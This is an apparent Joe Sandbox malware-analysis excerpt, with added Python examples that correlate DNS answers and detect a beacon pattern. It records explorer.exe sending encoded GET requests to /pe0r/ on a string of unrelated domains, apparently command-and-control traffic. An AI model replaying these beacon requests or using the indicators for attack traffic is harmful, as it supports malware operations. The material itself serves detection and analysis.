Apr 8, 2021 13:23:27.627649069 CEST | 8.8.8.8 | 192.168.2.4 | 0xa670 | Server failure (2) | www.lideresdeimmunocal.com | none | none | A (IP address) | IN (0x0001)
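Added example (not part of the Joe Sandbox report): a small correlation of the DNS Queries, DNS Answers and ICMP Packets tables above. It summarises what each candidate C2 name resolved to (following CNAME chains) and how often a query was retransmitted, and it matches answer arrival times against the three client-originated ICMP "port unreachable" messages. The rows embedded below are a constructed subset transcribed from the tables; the client source ports are taken from the UDP Packets rows with the same timestamps. The reading that the three flagged answers are late SERVFAIL replies to the retransmitted query 0xefcc, delivered to source port 59260 after the client had stopped listening on it, is the interpretation this example encodes, not a statement the report makes itself.

```python
from collections import defaultdict
from datetime import datetime


def ts(hms):
    # every timestamp in the tables is on 2021-04-08 CEST; only the time of day matters here
    return datetime.strptime(hms, "%H:%M:%S.%f")


# Constructed subset of the DNS Queries table: (time, transaction id, client source port, name)
QUERIES = [
    (ts("13:22:07.081368"), 0xd067, 61721, "www.1364kensington.com"),
    (ts("13:22:12.456660"), 0x1d91, 56448, "www.essentials-trading.com"),
    (ts("13:22:17.520349"), 0x8094, 61531, "www.luegomusic.com"),
    (ts("13:23:17.182508"), 0xefcc, 59260, "www.coloradocouponclub.com"),
    (ts("13:23:18.192764"), 0xefcc, 59260, "www.coloradocouponclub.com"),
    (ts("13:23:19.208389"), 0xefcc, 59260, "www.coloradocouponclub.com"),
    (ts("13:23:21.224176"), 0xefcc, 59260, "www.coloradocouponclub.com"),
    (ts("13:23:27.210115"), 0xa670, 49944, "www.lideresdeimmunocal.com"),
]

# Constructed subset of the DNS Answers table: (time, transaction id, reply code, name, target, type)
# target is the address for an A record, the canonical name for a CNAME, None for an error reply
ANSWERS = [
    (ts("13:22:07.200592"), 0xd067, "No error", "www.1364kensington.com", "66.96.161.160", "A"),
    (ts("13:22:12.511807"), 0x1d91, "Name error", "www.essentials-trading.com", None, "A"),
    (ts("13:22:17.701608"), 0x8094, "No error", "www.luegomusic.com", "luegomusic.com", "CNAME"),
    (ts("13:22:17.701608"), 0x8094, "No error", "luegomusic.com", "162.241.244.61", "A"),
    (ts("13:23:22.195578"), 0xefcc, "Server failure", "www.coloradocouponclub.com", None, "A"),
    (ts("13:23:23.204312"), 0xefcc, "Server failure", "www.coloradocouponclub.com", None, "A"),
    (ts("13:23:24.221883"), 0xefcc, "Server failure", "www.coloradocouponclub.com", None, "A"),
    (ts("13:23:26.237104"), 0xefcc, "Server failure", "www.coloradocouponclub.com", None, "A"),
    (ts("13:23:27.627649"), 0xa670, "Server failure", "www.lideresdeimmunocal.com", None, "A"),
]

# The ICMP Packets table: the three "Destination Unreachable (Port unreachable)" messages
ICMP_PORT_UNREACHABLE = [ts("13:23:23.204497"), ts("13:23:24.222014"), ts("13:23:26.237204")]


def resolution_summary(queries, answers):
    """Per queried name: number of retransmissions (same transaction id re-sent),
    the final reply code, and the A addresses reached after following any CNAME chain."""
    by_id = defaultdict(list)
    for t, tid, port, name in queries:
        by_id[tid].append((t, port, name))
    summary = {}
    for tid, qs in by_id.items():
        name = qs[0][2]
        ans = [a for a in answers if a[1] == tid]
        cnames = {a[3]: a[4] for a in ans if a[5] == "CNAME"}
        a_records = defaultdict(list)
        for a in ans:
            if a[5] == "A" and a[4] is not None:
                a_records[a[3]].append(a[4])
        cur, seen = name, set()
        while cur in cnames and cur not in seen:  # bounded walk, tolerates a CNAME loop
            seen.add(cur)
            cur = cnames[cur]
        summary[name] = {
            "retransmissions": len(qs) - 1,
            "rcode": ans[-1][2] if ans else "no answer",
            "ips": a_records.get(cur, []),
        }
    return summary


def orphaned_answers(queries, answers, icmp_times, tolerance_ms=1.0):
    """Answers that arrive within tolerance_ms of a client-originated ICMP port
    unreachable: the resolver replied to a source port the client no longer had
    open, so the answer arrived too late to be consumed."""
    port_of = {tid: port for _, tid, port, _ in queries}
    hits = []
    for t, tid, rcode, name, _, _ in answers:
        if any(abs((t - ti).total_seconds()) * 1000 <= tolerance_ms for ti in icmp_times):
            hits.append((name, hex(tid), port_of[tid], rcode))
    return hits


if __name__ == "__main__":
    for name, info in resolution_summary(QUERIES, ANSWERS).items():
        print(f"{name:32} {info['rcode']:15} retx={info['retransmissions']} {info['ips']}")
    for hit in orphaned_answers(QUERIES, ANSWERS, ICMP_PORT_UNREACHABLE):
        print("late answer after socket close:", hit)
```

Running it lists one line per name and then the three 0xefcc answers whose arrival coincides with an ICMP message; the first SERVFAIL for 0xefcc (13:23:22.195) is not flagged, which is consistent with the client still holding port 59260 open at that moment and closing it once that reply was read.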

                                                                      HTTP Request Dependency Graph

                                                                      • www.1364kensington.com
                                                                      • www.luegomusic.com
                                                                      • www.kf350.com
                                                                      • www.pierresplayhouse.com
                                                                      • www.thecapitalhut.com
                                                                      • www.ssfgasia.com
                                                                      • www.desertfoxindustries.com
                                                                      • www.tennesseewheelrepair.com
                                                                      • www.rootedwithlovejax.com

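Added example (not part of the Joe Sandbox report): detection logic for the beacon shape that the HTTP Packets section below records for sessions 0 to 3: a GET from C:\Windows\explorer.exe to /pe0r/ with two query parameters, the first value different per host and the second (Yn=ybIHhf989FGTI0) identical across hosts, "Connection: close", and a request body of seven null bytes, sent to one host after another within a short window. The sample log is constructed from those four requests plus one made-up benign browser request that must not be flagged; the regex and the thresholds are this example's assumptions about the pattern, not values from the report.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log, transcribed from the four HTTP sessions in this report plus a
# made-up benign control entry (last). Fields: timestamp, process image, Host header,
# request line, raw request body as hex.
SAMPLE_LOG = [
    ("2021-04-08 13:22:07.319", r"C:\Windows\explorer.exe", "www.1364kensington.com",
     "GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1",
     "00 00 00 00 00 00 00"),
    ("2021-04-08 13:22:17.851", r"C:\Windows\explorer.exe", "www.luegomusic.com",
     "GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1",
     "00 00 00 00 00 00 00"),
    ("2021-04-08 13:22:23.881", r"C:\Windows\explorer.exe", "www.kf350.com",
     "GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1",
     "00 00 00 00 00 00 00"),
    ("2021-04-08 13:22:44.892", r"C:\Windows\explorer.exe", "www.pierresplayhouse.com",
     "GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1",
     "00 00 00 00 00 00 00"),
    # constructed benign control: an ordinary browser request carrying a query string
    ("2021-04-08 13:22:30.000", r"C:\Program Files\Mozilla Firefox\firefox.exe", "www.example.com",
     "GET /search?q=wheel+repair&page=2 HTTP/1.1", ""),
]

# Assumed beacon shape: GET /<short token>/?<p1>=<base64-ish>&<p2>=<base64-ish>
BEACON_URI = re.compile(
    r"^GET /(?P<token>[A-Za-z0-9]{2,8})/\?"
    r"(?P<p1>[A-Za-z0-9]+)=(?P<v1>[A-Za-z0-9+/=]+)&"
    r"(?P<p2>[A-Za-z0-9]+)=(?P<v2>[A-Za-z0-9+/=]+) HTTP/1\.[01]$"
)


def parse_request(request_line):
    """Return the URI components of a request matching the beacon shape, else None."""
    m = BEACON_URI.match(request_line)
    return m.groupdict() if m else None


def is_null_padded(body_hex):
    """True when the request body is non-empty and consists only of 0x00 bytes."""
    octets = body_hex.split()
    return bool(octets) and all(o == "00" for o in octets)


def find_beacon_clusters(log, window_seconds=60, min_hosts=3):
    """Group matching requests by (process, path token, parameter names, constant second
    value) and report every group that reaches >= min_hosts distinct Host headers inside
    a sliding window of window_seconds. A single such request is not suspicious on its
    own; the same token and constant parameter rotating across unrelated hosts is."""
    groups = defaultdict(list)
    for stamp, proc, host, req, body in log:
        parts = parse_request(req)
        if parts is None:
            continue
        key = (proc, parts["token"], parts["p1"], parts["p2"], parts["v2"])
        when = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S.%f")
        groups[key].append((when, host, is_null_padded(body)))
    findings = []
    for key, hits in groups.items():
        hits.sort()
        for i in range(len(hits)):
            j = i
            while j + 1 < len(hits) and (hits[j + 1][0] - hits[i][0]).total_seconds() <= window_seconds:
                j += 1
            window = hits[i:j + 1]
            hosts = {h for _, h, _ in window}
            if len(hosts) >= min_hosts:
                findings.append({
                    "process": key[0],
                    "token": key[1],
                    "const_param": f"{key[3]}={key[4]}",
                    "hosts": sorted(hosts),
                    "null_padded_body": all(p for _, _, p in window),
                    "span_seconds": round((window[-1][0] - window[0][0]).total_seconds(), 3),
                })
                break  # one finding per group is enough
    return findings


if __name__ == "__main__":
    for f in find_beacon_clusters(SAMPLE_LOG):
        print(f)
```

The grouping key deliberately excludes the Host header and the first query value (both change per request) and keys on what stays constant across the rotation; pairing that with the originating process and the all-zero body keeps an ordinary browser request with two query parameters out of the result.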
                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49751 | 66.96.161.160 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:22:07.319251060 CEST | 1216 | OUT | GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.1364kensington.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Apr 8, 2021 13:22:07.443166971 CEST | 1217 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 08 Apr 2021 11:22:07 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 
3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49764 | 162.241.244.61 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:22:17.851991892 CEST | 2104 | OUT | GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.luegomusic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Apr 8, 2021 13:22:18.669209003 CEST | 2105 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:17 GMT
                                                                      Server: Apache
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Location: http://luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0
                                                                      host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                      X-Endurance-Cache-Level: 0
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49770 | 107.178.142.156 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:22:23.881720066 CEST | 2159 | OUT | GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.kf350.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Apr 8, 2021 13:22:27.418097019 CEST | 6582 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 08 Apr 2021 11:22:35 GMT
                                                                      Content-Length: 331
                                                                      Content-Type: text/html
                                                                      Server: Microsoft-IIS/7.5
                                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b9 d9 cd f8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49771 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:22:44.892147064 CEST | 6584 | OUT | GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.pierresplayhouse.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Timestamp: Apr 8, 2021 13:22:45.002899885 CEST, kBytes transferred: 6585, Direction: IN
Data: HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ==
Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head><!--[if IE 6 ]><body class="ie6"><![endif]--><!--[if IE 7 ]><body class="ie7"><![endif]--><!--[if IE 8 ]><body class="ie8"><![endif]--><!--[if IE 9 ]><body class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]> --><body><!--<![endif]--><script type="text/javascript">g_pb=(function(){var DT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
Timestamp: Apr 8, 2021 13:22:45.002926111 CEST, kBytes transferred: 6587, Direction: IN
Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
Timestamp: Apr 8, 2021 13:22:45.002974033 CEST, kBytes transferred: 6588, Direction: IN
Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
Timestamp: Apr 8, 2021 13:22:45.002993107 CEST, kBytes transferred: 6588, Direction: IN
Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
Timestamp: Apr 8, 2021 13:22:45.003007889 CEST, kBytes transferred: 6589, Direction: IN
Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


Session ID: 4, Source IP: 192.168.2.4, Source Port: 49772, Destination IP: 35.246.6.109, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Apr 8, 2021 13:22:50.107975006 CEST, kBytes transferred: 6590, Direction: OUT
Data: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.thecapitalhut.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Timestamp: Apr 8, 2021 13:22:50.173912048 CEST, kBytes transferred: 6591, Direction: IN
Data: HTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:50 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      location: https://www.thecapitalhut.com/pe0r?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0
                                                                      strict-transport-security: max-age=120
                                                                      x-wix-request-id: 1617880970.125913965966121268
                                                                      Age: 0
                                                                      Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                      X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgmNySqidgeEPHXBvm3U9iS,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRalh3hwieZdjPl8CZNSQhfEynGR4aF8yrGttME1Z/doJQd3fKEXQvQlSAkB/lstal9R73i9xLAFDBM1sgnz44DHz8=,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,sqmudy1rWy5CXemzdhzS/IdY/BHPTlKnJIetyMef762TzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,k4IrXgMmYJ2VF1cp9wAw75WSI3OLjEFdjvyrPhumLIdLrTe66AYUmhbsk95nB1oVKjCWKapddFlOEEDxcGowaw==
                                                                      Cache-Control: no-cache
                                                                      Server: Pepyaka/1.19.0


Session ID: 5, Source IP: 192.168.2.4, Source Port: 49774, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Apr 8, 2021 13:22:55.232578993 CEST, kBytes transferred: 6600, Direction: OUT
Data: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.ssfgasia.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Timestamp: Apr 8, 2021 13:22:55.347368956 CEST, kBytes transferred: 6601, Direction: IN
Data: HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "6061898c-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 6, Source IP: 192.168.2.4, Source Port: 49776, Destination IP: 184.168.131.241, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Apr 8, 2021 13:23:00.599381924 CEST, kBytes transferred: 6612, Direction: OUT
Data: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.desertfoxindustries.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Timestamp: Apr 8, 2021 13:23:00.805794001 CEST, kBytes transferred: 6612, Direction: IN
Data: HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: http://www.etsy.com/shop/DesertFoxIndustries?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


Session ID: 7, Source IP: 192.168.2.4, Source Port: 49777, Destination IP: 184.168.131.241, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Apr 8, 2021 13:23:06.701818943 CEST, kBytes transferred: 6613, Direction: OUT
Data: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.tennesseewheelrepair.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Timestamp: Apr 8, 2021 13:23:06.904542923 CEST, kBytes transferred: 6613, Direction: IN
Data: HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:06 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: https://musiccityrecon.com/wheel-repair.htm?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


Session ID: 8, Source IP: 192.168.2.4, Source Port: 49778, Destination IP: 216.239.36.21, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Apr 8, 2021 13:23:12.007415056 CEST, kBytes transferred: 6616, Direction: OUT
Data: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.rootedwithlovejax.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
